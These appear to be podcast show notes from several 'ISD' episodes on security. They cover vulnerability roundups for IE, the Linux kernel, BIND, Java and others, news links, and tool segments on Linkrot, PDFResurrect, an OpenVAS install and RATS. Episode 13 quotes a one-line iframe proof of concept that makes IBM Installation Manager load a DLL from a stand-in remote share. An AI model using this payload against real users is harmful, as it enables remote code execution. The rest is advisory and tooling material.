Your daily source of Pwnage, Policy and Politics.

ISD Episode 14

Vulnerabilities of Interest:

  1. VUPEN is reporting that a vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the “getElementsByTagName()” method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.
  2. NTP ‘ntpq’ Stack Buffer Overflow Vulnerability – The ‘ntpq’ command is prone to a stack-based buffer-overflow vulnerability.  Successful exploits will crash the affected utility. Code execution may also be possible, but has not been confirmed.
  3. Cisco VPN Client “cvpnd” Service Local Denial of Service – A vulnerability has been reported in Cisco VPN Client, which can be exploited by malicious, local users to cause a DoS (Denial of Service). The vulnerability is caused by improper error handling within the cvpnd.exe binary, which can be exploited to terminate the cvpnd service along with all active VPN sessions. The vulnerability is reported in versions prior to 5.0.06.0100. The solution is to update to version 5.0.06.0100.
  4. Linux Kernel ‘NFS filename’ Local Denial of Service Vulnerability – The Linux kernel is prone to a local denial-of-service vulnerability. Attackers can exploit this issue to trigger a kernel oops, resulting in a denial-of-service condition.
  5. Linux Kernel ‘exit_notify()’ CAP_KILL Verification Local Privilege Escalation Vulnerability – The Linux kernel is prone to a local privilege-escalation vulnerability. A local attacker can exploit this issue to execute arbitrary code with superuser privileges, resulting in a complete compromise of the affected computer. Versions prior to Linux kernel 2.6.29-git14 are vulnerable. An exploit is available in the wild.
  6. Linux Kernel CIFS Remote Buffer Overflow Vulnerability – The Linux Kernel is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code with kernel-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. Failed exploit attempts will result in a denial-of-service condition. The issue affects Linux Kernel 2.6.29; other versions may also be vulnerable.
  7. Linux Kernel nfsd ‘CAP_MKNOD’ Unauthorized Access Vulnerability – The Linux Kernel is prone to an unauthorized-access vulnerability that can occur when users with certain capabilities connect to the ‘nfsd’ service. Attackers with authenticated access to the affected application can exploit this issue to perform privileged operations on a vulnerable computer; this may aid in further attacks. The issue can be exploited using readily available tools.
  8. ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability – ISC BIND is prone to a remote denial-of-service vulnerability because the software fails to properly handle specially crafted dynamic update requests. Successfully exploiting this issue allows remote attackers to crash affected DNS servers, denying further service to legitimate users. Other attacks are also possible. Versions prior to BIND 9.4.3-P3, 9.5.1-P3, and 9.6.1-P3 are vulnerable. This issue is being actively exploited in the wild.
  9. Sun Solaris OpenSSL TLS Session Renegotiation Plaintext Injection Vulnerability -  Sun has acknowledged a vulnerability in Solaris, which can be exploited by malicious people to manipulate certain data. A final resolution is pending completion.


News Items of Interest:


News item 1: (http://www.v3.co.uk/v3/news/2253708/insurers-found-facebook)


News item 2: (http://www.itworldcanada.com/news/reputation-based-security-to-dominate/139392)


News item 3: (http://www.theregister.co.uk/2009/11/20/snow_leopard_atom_support/)

A custom version of OS 10.6.2 is distributed here. More about how to install the patch is available from this forum at Insanely Mac.

News item 4: (http://blogs.zdnet.com/green/?p=8783)

News item 5: (http://news.cnet.com/8301-13860_3-10402783-56.html?part=rss&subj=news&tag=2547-1_3-0-20)

News item 6: (http://www.sciencedaily.com/releases/2009/11/091118160627.htm)

News item 7: (http://news.softpedia.com/news/Comcast-Domain-Hijackers-Indicted-127635.shtml)

Tech Segment:

Linkrot scans a site for inaccessible links (HTTP errors 404, 500, etc.) and saves a log of the bad links that you can open in Excel. It’s a Windows console application developed in C# (.NET 2.0 stack). It does simple, single-threaded crawling for dead, broken and dangling links.

C:\Users\rhayes\Downloads>linkrot

Finds inaccessible links in a website (single thread version).
All links are written to Links.txt.
Bad links are written to Error.txt.

Use:             linkrot.exe <url>
Example:         linkrot.exe http://www.linkrot.be/
Example:         linkrot.exe http://www.linkrot.be/ >> logfile.txt

Error level -1:  Parameter fault, given url is not accessible.
Error level  0:  All went well, no bad links found.
Error level  1:  Bad links found, see error log for details.

Comments to info@patrick.nl, www.patrick.nl.

C:\Users\rhayes\Downloads>linkrot http://www.irongeek.com >>logfile.txt

logfile.txt:
Resolved  http://www.irongeek.com/
Resolved  http://www.dreamhost.com/r.cgi?155413
Resolved  http://www.irongeek.com/i.php
Resolved  http://www.irongeek.com/i.php?page=security/hackingillustrated
Resolved  http://www.irongeek.com/i.php?page=security/security
Resolved  http://www.irongeek.com/i.php?page=mobile-device-hacking
Resolved  http://www.irongeek.com/i.php?page=security/code
Resolved  http://www.irongeek.com/i.php?page=reviews/reviews
Resolved  http://feedproxy.google.com/IrongeeksSecuritySite
Resolved  http://www.irongeek.com/browserinfo.php
Resolved  http://www.irongeek.com/security-podcasts.php
Resolved  http://www.irongeek.com/i.php?page=hoosier
Resolved  http://www.irongeek.com/newscat.php
Resolved  http://www.irongeek.com/i.php?page=links
Resolved  http://www.irongeek.com/i.php?page=contact
Resolved  http://www.irongeek.com/i.php?page=forum/index
Resolved  http://www.irongeek.com/i.php?page=workout/workout
Resolved  http://www.irongeek.com/i.php?page=fitness/nutrition
Resolved  http://www.irongeek.com/i.php?page=fitness/supplements
Resolved  http://www.irongeek.com/i.php?page=humor/humor
Resolved  http://www.irongeek.com/i.php?page=advertise
Resolved  http://www.irongeek.com/i.php?page=hire-adrian-for-security-or-tech-w
Resolved  http://www.irongeek.com/i.php?page=campuses-that-use-irongeek-for-tea
Resolved  http://www.irongeek.com/fed-watch.php

Links.txt
Status    Found on page    Link    Milliseconds    Content type
Resolved    http://www.irongeek.com/    http://www.irongeek.com/    9219    text/html
Resolved    http://www.irongeek.com/    http://www.dreamhost.com/r.cgi?155413    2958    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php    1375    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=security/hackingillustrated    1415    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=security/security    1876    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=mobile-device-hacking    3471    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=security/code    755    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=reviews/reviews    765    text/html
Resolved    http://www.irongeek.com/    http://feedproxy.google.com/IrongeeksSecuritySite    12794    text/xml; charset=UTF-8
Resolved    http://www.irongeek.com/    http://www.irongeek.com/browserinfo.php    1620    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/security-podcasts.php    5396    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=hoosier    283    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/newscat.php    453    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=links    221    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=contact    261    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=forum/index    140    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=workout/workout    342    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=fitness/nutrition    145    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=fitness/supplements    309    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=humor/humor    215    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=advertise    183    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=hire-adrian-for-security-or-tech-work-in-louisville-or-southern-indiana-kentuckiana    169    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education    210    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/fed-watch.php    3629    text/html
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=books    466    text/html
Resolved    http://www.irongeek.com/    http://www.printfection.com/irongeek/    5934    text/html; charset=UTF-8
Resolved    http://www.irongeek.com/    http://www.irongeek.com/i.php?page=about    1824    text/html

Error.txt:
Error message    Found on page    Bad link    Milliseconds
Timeout    http://www.irongeek.com/    http://www.packetsniffers.org/    21495
Timeout    http://www.irongeek.com/    http://hackhound.org/    21106
Timeout    http://www.irongeek.com/    http://hackhound.org/images/button2.gif    21007
NotFound    http://www.irongeek.com/i.php?page=security/hackingillustrated    http://leebaird.com/Me/Hacking.html    559
Timeout    http://www.irongeek.com/i.php?page=security/hackingillustrated    http://phreaknic.wilpig.org/    21208

Linkrot is available as a command-line utility and as source code from here: Linkrot

ISD Episode 13 (the suck!)

Vulnerabilities of Interest:

  1. file CDF File Parsing Multiple Buffer Overflow Vulnerabilities – The ‘file’ command is prone to multiple buffer-overflow vulnerabilities because it fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Versions prior to ‘file’ 5.02 are vulnerable.
  2. Sun Java Runtime Environment Multiple Unspecified Same Origin Policy Violation Vulnerabilities – Sun Java Runtime Environment is prone to multiple unspecified vulnerabilities that allow attackers to bypass the same-origin policy. This issue occurs because the application fails to properly enforce the same-origin policy for Java applets. An attacker may create a malicious applet that is loaded from a remote system to circumvent network access restrictions. The following are affected: JDK and JRE 6 Update 6 and earlier, JDK and JRE 5.0 Update 15 and earlier, SDK and JRE 1.4.2_17 and earlier, and SDK and JRE 1.3.x_22 and earlier.
  3. Sun Java Runtime Environment XML Data Processing Multiple Vulnerabilities – Sun Java Runtime Environment is prone to multiple remote vulnerabilities. An attacker can exploit these issues to obtain sensitive information or crash the affected application, denying service to legitimate users. These issues affect the following versions on Solaris, Linux, and Windows platforms: JDK and JRE 6 Update 6 and earlier as well as JDK and JRE 5.0 Update 15 and earlier.
  4. Sun Java SE Java Management Extensions (JMX) Unspecified Unauthorized Access Vulnerability – JMX is prone to an unspecified unauthorized-access vulnerability. The vulnerability allows a JMX client to perform unauthorized actions on a computer running JMX with local monitoring enabled. The issue affects the following versions for Windows, Solaris, and Linux: JDK and JRE 6 Update 6 and earlier as well as JDK and JRE 5.0 Update 15 and earlier.
  5. Sun Java Runtime Environment Virtual Machine Privilege Escalation Vulnerability – Sun Java Runtime Environment Virtual Machine is prone to a privilege-escalation vulnerability when running untrusted applications or applets. Successful exploits may allow attackers to read, write, or execute arbitrary local files in the context of the user running an untrusted application in the affected virtual machine. This may result in a compromise of the underlying system. This issue affects the following versions: JDK and JRE 6 Update 6 and earlier, JDK and JRE 5.0 Update 15 and earlier, and SDK and JRE 1.4.2_17 and earlier.
  6. Hitachi Multiple Products Remote Code Execution Vulnerabilities – Multiple products from Hitachi are prone to multiple code-execution vulnerabilities. A remote attacker could exploit these issues by enticing a victim to open a malicious file. Successfully exploiting these issues would allow the attacker to execute arbitrary code in the context of the currently logged-in user or cause denial-of-service conditions.
  7. IBM Installation Manager ‘iim://’ URI Handling Remote Code Execution Vulnerability – IBM Installation Manager is prone to a remote code-execution vulnerability. Attackers could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions. The following products that include Installation Manager are vulnerable: IBM Rational Robot and IBM Rational Team Concert. The following proof of concept is available: <iframe src='iim://" -vm \\www.example.com\uncshare\sh.dll -url "'></iframe> Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
  8. Omni-NFS Multiple Stack Buffer Overflow Vulnerabilities – Omni-NFS is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to properly bounds-check user-supplied network data before copying it into an insufficiently sized memory buffer. The issues affect both server and client. Exploiting these issues allows attackers to execute arbitrary machine code in the context of users running the affected application. Failed attempts will likely crash the application, resulting in denial-of-service conditions. Omni-NFS 5.2 is vulnerable; other versions may also be affected. Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. Exploits are also available in the wild.
  9. Hitachi Device Manager IPv6 Security Bypass Vulnerability – Hitachi Device Manager and JP1/HiCommand are prone to a security-bypass vulnerability because of an unspecified error related to IPv6 functionality. Very few technical details are available as of now though we will continue to monitor this one. Hitachi Multiple Products GIF File Parsing Buffer Overflow Vulnerability – Multiple Hitachi products, including Cosminexus, Processing Kit for XML, and Hitachi Developer’s Kit for Java, are prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer. Attackers can execute arbitrary code in the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
  10. Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability – The Apache ‘mod_proxy_ftp’ module is prone to a denial-of-service vulnerability because of a NULL-pointer dereference. Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed. A working commercial exploit is available through Intevydis; otherwise, no exploit is publicly available or known to be circulating in the wild.
  11. WebKit Preflight Request Same-Origin Policy Bypass Vulnerability – WebKit is prone to a vulnerability that lets attackers bypass the same-origin policy.  Attackers can exploit this issue to access resources from another origin in the context of another domain. This can facilitate cross-site request-forgery attacks.
  12. Sun Solaris Samba Information Disclosure and Denial of Service – Sun has acknowledged some vulnerabilities in Samba in Solaris, which can be exploited by malicious users to disclose sensitive information and cause a DoS (Denial of Service).

News Items of Interest:



News item 1: (http://www.theglobeandmail.com/news/technology/rim-security-chief-warns-of-future-smart-phone-attacks/article1368297/)

News item 2: (http://www.h-online.com/security/news/item/Fedora-12-allows-users-install-privilege-Update-863623.html)

News item 3: (http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1374839,00.html)

News item 4: (http://www.reuters.com/article/rbssTechMediaTelecomNews/idUSPEK26455220091119?rpc=401)

News item 5: (http://www.cio.com/article/508029/How_to_Hack_China_for_Just_1_800?source=rss_security)

News item 6: (http://www.informationweek.com/news/government/policy/showArticle.jhtml?articleID=221900107)


Tech Segment:

PDFResurrect is a tool aimed at analyzing PDF documents. The PDF format allows for previous document changes to be retained in a more recent version of the document, thereby creating a running history of changes for the document. This tool attempts to extract all previous versions while also producing a summary of changes between versions. This tool can also “scrub” or write data over the original instances of PDF objects that have been modified or deleted, in an effort to disguise information from previous versions that might not be intended for anyone else to read.

This project is released under the GNU GPLv3 license. So have at it!

Download PDFResurrect v0.9
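What the retained history described above looks like at the byte level, as an added example (not PDFResurrect's code): each incremental save appends to the file and ends with its own %%EOF marker, so truncating at each marker yields an earlier version. SAMPLE is a constructed two-revision document with xref tables omitted, and the function names are this example's own.

```python
import re

# A revision ends at an %%EOF marker; an incremental save appends new object
# definitions, a new trailer and another %%EOF after the existing bytes.
EOF_RE = re.compile(rb"%%EOF[ \t]*(?:\r\n|\r|\n)?")
OBJ_RE = re.compile(rb"(?<![\w.])(\d+)\s+(\d+)\s+obj\b")


def split_revisions(data):
    """Return each saved revision: the file truncated at successive %%EOF markers."""
    return [data[:m.end()] for m in EOF_RE.finditer(data)]


def objects_in(data):
    """Map (object number, generation) to the body of its last definition.

    Purely lexical: objects packed into compressed object streams, and binary
    stream data that happens to contain these keywords, are not handled.
    """
    objs = {}
    for m in OBJ_RE.finditer(data):
        end = data.find(b"endobj", m.end())
        if end != -1:
            objs[(int(m.group(1)), int(m.group(2)))] = data[m.end():end].strip()
    return objs


def revision_history(data):
    """Summarize, per revision, which objects were added or redefined.

    "superseded" holds the old bodies that a later save replaced. They are
    still present in the file, which is the data a scrub has to overwrite.
    """
    history, prev = [], {}
    for number, rev in enumerate(split_revisions(data), 1):
        cur = objects_in(rev)
        changed = sorted(k for k in prev if cur.get(k) != prev[k])
        history.append({
            "revision": number,
            "size": len(rev),
            "added": sorted(k for k in cur if k not in prev),
            "modified": changed,
            "superseded": {k: prev[k] for k in changed},
        })
        prev = cur
    return history


# Constructed sample: revision 1, then an incremental update that redefines
# object 4 and adds object 5. Offsets after startxref are dummies.
SAMPLE = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R /Contents 4 0 R >>\nendobj\n"
    b"4 0 obj\n<< /Length 25 >>\nstream\nBT (Salary: 120000) Tj ET\nendstream\nendobj\n"
    b"trailer\n<< /Size 5 /Root 1 0 R >>\nstartxref\n0\n%%EOF\n"
    b"4 0 obj\n<< /Length 29 >>\nstream\nBT (Salary: [redacted]) Tj ET\nendstream\nendobj\n"
    b"5 0 obj\n<< /Producer (constructed) >>\nendobj\n"
    b"trailer\n<< /Size 6 /Root 1 0 R /Prev 0 >>\nstartxref\n0\n%%EOF\n"
)

if __name__ == "__main__":
    for entry in revision_history(SAMPLE):
        print("revision", entry["revision"], "size", entry["size"],
              "added", entry["added"], "modified", entry["modified"])
        for key, body in entry["superseded"].items():
            print("  old body of object", key, "still in file:", body[:60])
```

The current view of object 4 shows only the redacted text, yet the original value is still readable in the file's first revision.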

ISD Episode 12

Vulnerabilities of Interest:

  1. Kolab Server ClamAV Archive Handling Security Bypass – Some security issues have been reported in Kolab Server, which can potentially be exploited by malware to bypass certain security restrictions. The security issues are caused due to errors in the handling of certain file types in combination with ClamAV. This can be exploited to bypass security restrictions specified for certain files. Solution is to upgrade the ClamAV package to version 0.95.3.
  2. Kaspersky Anti-Virus 2010 kl1.sys Denial of Service Vulnerability – A vulnerability has been discovered in Kaspersky Anti-Virus 2010, which can be exploited by malicious, local users to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the kl1.sys driver when handling IOCTLs. This can be exploited to dereference invalid memory and cause a kernel crash via a specially crafted 0x0022C008 IOCTL. The vulnerability is confirmed in version 9.0.0.463. Other versions may also be affected. Solution is to update to version 9.0.0.736.
  3. Sun Java SE Multiple Security Vulnerabilities – Sun has released updates to address multiple vulnerabilities in Java SE. Very little technical information is currently available on these issues. These issues are addressed in the following releases: JDK and JRE 6 Update 15, JDK and JRE 5.0 Update 20, SDK and JRE 1.4.2_22, and SDK and JRE 1.3.1_26.
  4. Serv-U Web Client HTTP Request Remote Buffer Overflow Vulnerability – Serv-U Web Client is prone to a buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Serv-U Web Client 9.0.0.5 is vulnerable; other versions may also be affected. Exploits are available in the wild.
  5. RhinoSoft Serv-U FTP Server TEA Decoder Remote Stack Buffer Overflow Vulnerability – RhinoSoft Serv-U FTP Server is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Serv-U 9.0.0.5 is vulnerable; other versions may also be affected.
  6. Sun Java Web Start and Java Plug-in JAR File Privilege Escalation Vulnerability – Sun Java Web Start and Java Plug-in are prone to a privilege-escalation vulnerability. This issue occurs when the affected applications parse a JAR file that is also a legitimate GIF image file. An attacker may exploit this issue to obtain sensitive information (such as HTTP session cookies) or to perform actions as legitimate users of a web application. This may aid in further attacks. NOTE: This issue was previously covered in BID 32620 (Sun Java Web Start and Java Plug-in Multiple Privilege Escalation Vulnerabilities), but has been given its own record to better document the issue. The following versions are affected: JDK and JRE 6 Update 10 and earlier, JDK and JRE 5.0 Update 16 and earlier, SDK and JRE 1.4.2_18 and earlier, and SDK and JRE 1.3.1_23 and earlier
  7. IBM SolidDB ‘solid.exe’ Denial of Service Vulnerability – IBM SolidDB is prone to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. This issue affects SolidDB 6.30.0.29 and 6.30.0.33; other versions may also be affected.  Exploits are available in the wild.
  8. Multiple Vendor TLS Protocol Session Renegotiation Security Vulnerability – Same deal just more vendors being added.  Again check with your vendor on this for updates.

News Items of Interest:


News item 1: (http://www.domainb.com/infotech/itnews/20091117_indo-pak_cyber_war.html)

News item 2: (http://www.networkworld.com/news/2009/111709-endpoint-security.html)

News item 3: (http://www.jdjournal.com/2009/11/17/hackers-targeting-large-law-firms-in-increasing-numbers/)

News item 4: (http://www.out-law.com//default.aspx?page=10530)

News item 5: (http://www.pcadvisor.co.uk/news/index.cfm?…id=3206496&)

News item 6: (http://www.infoworld.com/d/security-central/64-bit-windows-safer-claims-microsoft-787?source=rss_infoworld_news)

Tech Segment:


OpenVAS

OpenVAS is a new security assessment tool designed as an alternative to Nessus.  According to the OpenVAS website:

OpenVAS stands for Open Vulnerability Assessment System and is a network security scanner with associated tools like a graphical user front-end. The core component is a server with a set of network vulnerability tests (NVTs) to detect security problems in remote systems and applications.

OpenVAS products are Free Software under GNU GPL and a fork of Nessus.

OpenVAS is designed to run on Linux, not on Windows. An ideal approach is to download the BackTrack virtual appliance, and then run OpenVAS on BackTrack. A virtual appliance can be based on Linux and still run on a Windows computer.

Here are basic instructions for installing OpenVAS onto the virtual machine:

First, you will need either VMware Player, VMware Server or VMware Workstation on your PC.  You will then need to download the BackTrack virtual appliance:

Once you get BackTrack up and running, you can log in as root (password: toor) by default. Launch Firefox so that we can grab the latest version of the OpenVAS packages from the following website: apt.intevation.de/dists/lenny/openvas/binary-i386/?1246159210

libopenvas2_2.0.4-1intevation1_i386.deb
libopenvasnasl2_2.0.2-1intevation1_i386.deb
openvas-client_2.0.5-1intevation1_i386.deb
openvas-plugins_1.0.6-1intevation2_i386.deb
openvas-server_2.0.3-1intevation1_i386.deb

Grab the Pth, GD and GNOME wrapper libraries:
packages.debian.org/lenny/i386/libpth20/download
packages.debian.org/lenny/i386/libgpgme11/download
packages.debian.org/lenny/i386/libgdchart-gd2-noxpm/download

Finally, you will need to grab HTMLDOC: htmldoc.org/software.php?VERSION=1.9.x-r1586&FILE=htmldoc/snapshots/htmldoc-1.9.x-r1586.tar.gz

wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/libopenvas2_2.0.4-1intevation1_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/libopenvasnasl2_2.0.2-1intevation1_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/openvas-client_2.0.5-1intevation1_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/openvas-plugins_1.0.6-1intevation2_i386.deb
wget http://apt.intevation.de/dists/lenny/openvas/binary-i386/openvas-server_2.0.3-1intevation1_i386.deb
wget http://http.us.debian.org/debian/pool/main/p/pth/libpth20_2.0.7-12_i386.deb
wget http://http.us.debian.org/debian/pool/main/g/gpgme1.0/libgpgme11_1.1.6-2_i386.deb
wget http://http.us.debian.org/debian/pool/main/libg/libgdchart-gd2/libgdchart-gd2-noxpm_0.11.5-6_i386.deb
wget ftp://nic.funet.fi/.m/mirrors2/ftp.easysw.com/pub/htmldoc/snapshots/htmldoc-1.9.x-r1586.tar.gz

Open the terminal and run the following commands in order:

dpkg -i libopenvas2_2.0.4-1intevation1_i386.deb
ldconfig
dpkg -i libpth20_2.0.7-12_i386.deb
dpkg -i libgpgme11_1.1.6-2_i386.deb
dpkg -i libopenvasnasl2_2.0.2-1intevation1_i386.deb
dpkg -i openvas-plugins_1.0.6-1intevation2_i386.deb
dpkg -i openvas-server_2.0.3-1intevation1_i386.deb
dpkg -i libgdchart-gd2-noxpm_0.11.5-6_i386.deb
dpkg -i openvas-client_2.0.5-1intevation1_i386.deb
tar -zxvf htmldoc-1.9.x-r1586.tar.gz
cd htmldoc-1.9.x-r1586
./configure
make
make install
openvas-adduser

root@bt:~/htmldoc-1.9.x-r1586# openvas-adduser
/usr/sbin/openvas-adduser: 75: 0: not found
Using /var/tmp as a temporary file holder.

Add a new openvasd user
———————————


Login : admin
Authentication (pass/cert) [pass] : pass
Login password :
Login password (again) :

User rules
—————
openvasd has a rules system which allows you to restrict the hosts that admin has the right to test.
For instance, you may want him to be able to scan his own host only.

Please see the openvas-adduser(8) man page for the rules syntax.

Enter the rules for this user, and hit ctrl-D once you are done:
(the user can have an empty rules set)



Login             : admin
Password          : ***********

Rules             :



Is that ok? (y/n) [y] y
user added.

openvas-mkcert

root@bt:~/htmldoc-1.9.x-r1586# openvas-mkcert
/usr/sbin/openvas-mkcert: 85: 0: not found
——————————————————————————-
Creation of the OpenVAS SSL Certificate
——————————————————————————-

This script will now ask you the relevant information to create the SSL certificate of OpenVAS.
Note that this information will *NOT* be sent to anybody (everything stays local), but anyone with the ability to connect to your OpenVAS daemon will be able to retrieve this information.


CA certificate life time in days [1460]:
Server certificate life time in days [365]:
Your country (two letter code) [FR]: US
Your state or province name [none]:
Your location (e.g. town) [Paris]: Atlanta
Your organization [OpenVAS Users United]:






——————————————————————————-
Creation of the OpenVAS SSL Certificate
——————————————————————————-

Congratulations. Your server certificate was properly created.

/etc/openvas/openvasd.conf updated
The following files were created:

. Certification authority:
Certificate = /var/lib/openvas/CA/cacert.pem
Private key = /var/lib/openvas/private/CA/cakey.pem

. OpenVAS Server :
Certificate = /var/lib/openvas/CA/servercert.pem
Private key = /var/lib/openvas/private/CA/serverkey.pem

Press [ENTER] to exit

openvas-nvt-sync

Start the OpenVAS server by typing the command “openvasd” in the terminal. Open the OpenVAS Client by clicking on the Start button, going to Internet, and then clicking on OpenVAS-Client. Choose File > Connect and enter the username and password that you created earlier. Wait for the client to connect to the server, then click File and then Scan Assistant.

Enter “localhost” to target your own computer for a scan. Click the Execute button; once the scan is completed, you will see “Report” followed by the date in the left pane of the OpenVAS client. Click on the report, and you can explore the report results in the middle and right panes of the client. You can also click on Report on the top command line of the OpenVAS client and click Print to make a PDF copy of the report.

ISD Episode 11

Vulnerabilities of Interest:

  1. Gimp PSD Image Parsing Integer Overflow Vulnerability – Secunia Research has discovered a vulnerability in Gimp, which potentially can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an integer overflow within the "read_channel_data()" function in plug-ins/file-psd/psd-load.c. This can be exploited to cause a heap-based buffer overflow by e.g. tricking a user into opening a specially crafted PSD file. The vulnerability is confirmed in version 2.6.7. Other versions may also be affected.
  2. Linux Kernel KVM MCE "KVM_X86_SETUP_MCE" Buffer Overflow – A vulnerability has been reported in the Linux Kernel, which can be exploited by malicious, local users to cause a DoS (Denial of Service) and potentially gain escalated privileges. The vulnerability is caused due to an error within the "kvm_vcpu_ioctl_x86_setup_mce()" function in arch/x86/kvm/x86.c. This can be exploited to corrupt kernel memory by e.g. sending a specially crafted "KVM_X86_SETUP_MCE" IOCTL. Fixed in version 2.6.32-rc7.
  3. avast! Home/Professional aswRdr.sys Memory Corruption Vulnerability – A vulnerability has been discovered in avast! Home/Professional, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or potentially gain escalated privileges. The vulnerability is caused due to an error in aswRdr.sys when processing IOCTLs. This can be exploited to corrupt kernel memory via a specially crafted 0x80002024 IOCTL.
  4. Home FTP Server "SITE INDEX" Denial of Service – A vulnerability has been discovered in Home FTP Server, which can be exploited by malicious users to cause a DoS (Denial of Service). The vulnerability is caused due to an error in the handling of multiple "SITE INDEX" commands and can be exploited to stop the server. The vulnerability is confirmed in version 1.10.1.139. Other versions may also be affected. The currently offered solution is to restrict access to trusted users only.
  5. HP OpenView Network Node Manager 'ovdbrun.exe' Denial of Service Vulnerability – HP OpenView Network Node Manager (NNM) is prone to a remote denial-of-service vulnerability. An attacker may leverage this issue to crash the affected application, denying service to affected users. The issue affects NNM 7.51 and 7.53.  Exploit is available in the wild.
  6. HP Discovery & Dependency Mapping Inventory Arbitrary Code Execution – A vulnerability has been reported in HP Discovery & Dependency Mapping Inventory (DDMI), which can be exploited by malicious users to compromise a vulnerable system. The vulnerability is caused due to an unspecified error and can be exploited to execute arbitrary code.  The vulnerability is reported in HP Discovery & Dependency Mapping Inventory (DDMI) versions 2.5x, 7.5x, and 7.60, running on Windows.  Solution is to apply patches.
  7. Warcraft III JASS Interpreter Arbitrary Code Execution – Some vulnerabilities have been reported in Warcraft III: The Frozen Throne, which can be exploited by malicious people to potentially compromise a user's system. The vulnerabilities are caused due to errors within the JASS script handling, which can be exploited to e.g. execute arbitrary code by tricking a user into loading a specially crafted map. Partially fixed in version 1.24b.

News Items of Interest:

News item 1: (http://community.zdnet.co.uk/blog/0,1000000567,10014468o-2000331761b,00.htm?s_cid=292)

News item 2: (http://isc.sans.org/diary.html?storyid=7603&rss) OpenVPN recommends upgrading to version 2.1_rc21 which is available here. Additional information regarding OpenVPN session renegotiation is available here.

News item 3: (http://www.wtop.com/?nid=108&sid=1814785)

News item 4: (http://www.metasploit.com/framework/download) After 12 months of development, version 3.3 of the Metasploit Framework has been released. Version 3.3 includes 120 new exploit modules, over 100 new auxiliary modules, and 180 bug fixes.

News item 5: (http://www.businesswire.com/portal/site/topix/?dmViewId=news_view&newsId=20091117005045&newsLang=en) For more information and insight from DeepNines Security Lab: http://www.deepnines.com/security-lab/deepnines-security-labs.

News item 6: (http://www.infosecurity-magazine.com/view/5280/astaro-joins-free-it-security-software-industry-to-boost-profile/) The software is available in two flavours: software appliance and virtual appliance.

News item 7: http://blogs.zdnet.com/security/?p=4956&utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+zdnet%2Fsecurity+%28ZDNet+Zero+Day%29

Tech Segment:
Rough Auditing Tool for Security. RATS (Rough Auditing Tool for Security) is a tool for scanning C, C++, Perl, PHP and Python source code and flagging common security-related programming errors such as buffer overflows and TOCTOU (Time Of Check, Time Of Use) race conditions. RATS gives a security analyst a list of potential trouble spots on which to focus, describes each problem, and may suggest remedies. It also provides a relative assessment of the potential severity of each problem, to help an auditor prioritize. The tool also performs some basic analysis to try to rule out conditions that are obviously not problems. RATS is free software, under the terms of the GNU Public License.

